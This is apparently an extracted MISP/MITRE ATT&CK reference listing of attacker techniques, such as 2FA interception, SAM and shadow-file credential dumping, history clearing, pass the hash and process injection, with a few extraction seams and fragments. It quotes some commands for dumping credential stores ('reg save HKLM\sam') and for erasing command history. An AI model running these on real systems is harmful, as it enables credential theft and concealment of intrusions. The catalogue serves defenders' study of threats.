Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)

Other methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)

The tag is: misp-galaxy:mitre-attack-pattern="Two-Factor Authentication Interception - T1111"
Host-based hiding techniques - T1314

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).

Host based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)

The tag is: `misp-galaxy:mitre-attack-pattern="Host-based hiding techniques - T1314"`

Network-based hiding techniques - T1315

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1315).

Technical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. (Citation: HAMMERTOSS2015)

The tag is: `misp-galaxy:mitre-attack-pattern="Network-based hiding techniques - T1315"`

Targeted client-side exploitation - T1371

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics.
A technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user’s computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted client-side exploitation - T1371"

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**Insecure Third-Party Libraries - T1425**

Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities.

For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Insecure Third-Party Libraries - T1425"

Insecure Third-Party Libraries - T1425 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 3181. Table References

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**Exploit public-facing application - T1377**

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).

The use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit public-facing application - T1377"

Table 3182. Table References
Search Victim-Owned Websites - T1594

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: Email Addresses). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information) or Search Open Technical Databases, establishing operational resources (ex: Establish Accounts) or Compromise Accounts), and/or initial access (ex: Trusted Relationship) or Phishing).

The tag is: misp-galaxy:mitre-attack-pattern=“Search Victim-Owned Websites - T1594”

/etc/passwd and /etc/shadow - T1003.008

Adversaries may attempt to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking. Most modern Linux operating systems use a combination of /etc/passwd and /etc/shadow to store user account information including password hashes in /etc/shadow. By default, /etc/shadow is only readable by the root user.(Citation: Linux Password and Shadow File Formats)

The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper. (Citation: nixCraft - John the Ripper) 

The tag is: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008”
SMB/Windows Admin Shares - T1021.002

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)

The tag is: `misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002"

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**Reduce Key Space - T1600.001**

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications. (Citation: Cisco Synful Knock Evolution)

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Reduce Key Space - T1600.001"

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**Security Account Manager - T1003.002**

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the `<code>net user</code>` command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

- `pwdumpx.exe`
- [gsecdump](https://attack.mitre.org/software/S0008)
- [Mimikatz](https://attack.mitre.org/software/S0002)
- `secretsdump.py`

Alternatively, the SAM can be extracted from the Registry with Reg:

- `<code>reg save HKLM\sam sam</code>`
- `<code>reg save HKLM\system system</code>`

Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: [1352](#))
Notes: * RID 500 account is the local, built-in administrator. * RID 501 is the guest account. * User accounts start with a RID of 1,001+.

The tag is: *misp-galaxy:mitre-attack-pattern*="Security Account Manager - T1003.002"

### Table 3187. Table References

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<td><a href="https://github.com/Neohapsis/creddump7">https://github.com/Neohapsis/creddump7</a></td>
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# Disable Crypto Hardware - T1600.002

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)

The tag is: *misp-galaxy:mitre-attack-pattern*="Disable Crypto Hardware - T1600.002"

### Table 3188. Table References

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# Cached Domain Credentials - T1003.005

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable. (Citation: Microsoft - Cached Creds)

On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash. (Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password. (Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)

The tag is: `mispgalaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005"

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**Clear Command History - T1070.003**

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable `<code>HISTFILE</code>`. When a user logs off a system, this information is flushed to a file in the user’s home directory called `<code>~/.bash_history</code>`. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history `<code>history -c</code>`) or deleting the bash history file `<code>rm ~/.bash_history</code>.

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the `<code>PSReadLine</code>` module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The `<code>PSReadLine</code>` command history tracks the commands used in all PowerShell sessions and writes them to a file `<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code>` by default. This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)

Adversaries may run the PowerShell command `<code>Clear-History</code>` to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the `<code>ConsoleHost_history.txt</code>` file. Adversaries may also delete the
<code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003"

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Exfiltration Over Bluetooth - T1011.001

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001"

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Dead Drop Resolver - T1102.001

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through...
malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001"

### Remote Desktop Protocol - T1021.001

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services)

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence. (Citation: Alperovitch Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"

### Internet Connection Discovery - T1016.001

Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), `<code>tracert</code>`, and GET requests to websites.

Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses. Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.
Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005).

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence.

The tag is: `misp-galaxy:mitre-attack-pattern="Patch System Image - T1601.001"`

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**Exfiltration over USB - T1052.001**

Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.

The tag is: `misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001"`

**Table 3196. Table References**

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Downgrade System Image - T1601.002

Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).

The tag is: misp-galaxy:mitre-attack-pattern="Downgrade System Image - T1601.002"

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Windows Remote Management - T1021.006

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.

WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006"

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File Transfer Protocols - T1071.002

Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.

The tag is: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002"

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Invalid Code Signature - T1036.001

Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)

Unlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.

The tag is: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001"

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Local Data Staging - T1074.001

Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such
as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

The tag is: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001"

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**Application Access Token - T1550.001**

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001"

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</table>
SQL Stored Procedures - T1505.001

Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017)

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR)

The tag is: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001"

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Archive via Utility - T1560.001

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.

The tag is: `misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001"`

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**Additional Cloud Credentials - T1098.001**

Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.

Adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. (Citation: Microsoft SolarWinds Customer Guidance) (Citation: Blue Cloud of Death) (Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords. (Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. (Citation: Demystifying Azure AD Service Principals)

In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the `<code>CreateKeyPair</code>` or `<code>ImportKeyPair</code>` API in AWS or the `<code>gcloud compute os-login ssh-keys add</code>` command in GCP. (Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts. (Citation: Expel IO Evil in AWS) (Citation: Expel Behind the Scenes)

The tag is: `misp-galaxy:mitre-attack-pattern="Additional Cloud Credentials - T1098.001"`

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<td><a href="https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/">https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/</a></td>
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</table>
Compile After Delivery - T1027.004

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004"

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Remote Data Staging - T1074.002

Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.

In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)

By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002"
Portable Executable Injection - T1055.002

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as `<code>VirtualAllocEx</code>` and `<code>WriteProcessMemory</code>`, then invoked with `<code>CreateRemoteThread</code>` or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017)

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: `misp-galaxy:mitre-attack-pattern="Portable Executable Injection - T1055.002"`

Pass the Hash - T1550.002

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to “overpass the hash.” Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create
a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)

The tag is: *misp-galaxy:mitre-attack-pattern=*"Pass the Hash - T1550.002"

### Archive via Library - T1560.002

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

The tag is: *misp-galaxy:mitre-attack-pattern=*"Archive via Library - T1560.002"

### GUI Input Capture - T1056.002

Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).

Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits)
MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript (Citation: LogRhythm Do You Trust Oct 2014) and PowerShell (Citation: LogRhythm Do You Trust Oct 2014) (Citation: Enigma Phishing for Credentials Jan 2015).

The tag is: `misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002"`

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### Rename System Utilities - T1036.003

Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename `<code>rundll32.exe</code>`). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)

The tag is: `misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003"`

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### Network Logon Script - T1037.003

Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects. (Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could
apply to more than one or potentially all systems.

Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: *misp-galaxy:mitre-attack-pattern="Network Logon Script - T1037.003"

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### Thread Execution Hijacking - T1055.003

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to an existing victim process is first created with native Windows API calls such as `<code>OpenThread</code>`. At this point the process can be suspended then written to, realigned to the injected code, and resumed via `<code>SuspendThread</code>`, `<code>VirtualAllocEx</code>`, `<code>WriteProcessMemory</code>`, `<code>SetThreadContext</code>`, then `<code>ResumeThread</code>` respectively.(Citation: Elastic Process Injection July 2017)

This is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state.

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: *misp-galaxy:mitre-attack-pattern="Thread Execution Hijacking - T1055.003"

### Table 3214. Table References

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Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

